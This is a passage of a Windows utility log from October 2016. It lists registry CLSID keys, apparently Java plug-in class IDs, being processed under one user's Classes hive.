[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0050-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0051-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0051-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0051-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0052-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0052-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0052-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0053-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0053-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0053-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0054-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0054-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0054-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0055-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0055-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0055-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0056-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0056-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0056-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0057-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0057-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0057-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0058-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0058-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0058-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0059-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0059-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0059-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0060-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0060-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0060-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0061-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0061-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0061-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0062-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0062-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0062-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0063-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0063-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0063-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0064-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0064-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0064-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0065-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0065-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0065-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0066-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0066-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0066-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0067-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0067-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0067-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0068-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0068-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0068-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0069-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0069-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0069-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0070-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0070-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0070-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0071-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0071-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0071-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0072-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0072-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0072-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0073-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0073-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0073-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0074-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0074-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0074-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0075-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0075-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0075-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.241] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0076-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.242] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0076-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.242] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0076-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.242] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0077-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.242] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0077-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.242] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0077-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.242] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0078-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.242] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0078-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.242] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0078-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.242] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0079-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.242] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0079-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.242] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0079-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.242] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0080-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.242] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0080-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.242] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0080-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.242] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0081-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.243] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0081-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.243] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0081-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.243] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-FFFF-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.243] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0000-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.243] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0000-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.243] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0000-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.243] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0001-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.243] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0001-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.243] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0001-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.243] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0002-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.243] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0002-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.243] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0002-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.243] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.243] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.243] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.243] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0004-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0004-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0004-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0006-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0006-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0006-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0008-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0008-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0008-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0009-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0009-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.244] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0009-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.245] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0010-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.245] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0010-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.245] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0010-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.245] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.245] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.245] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.245] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.245] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBB}]
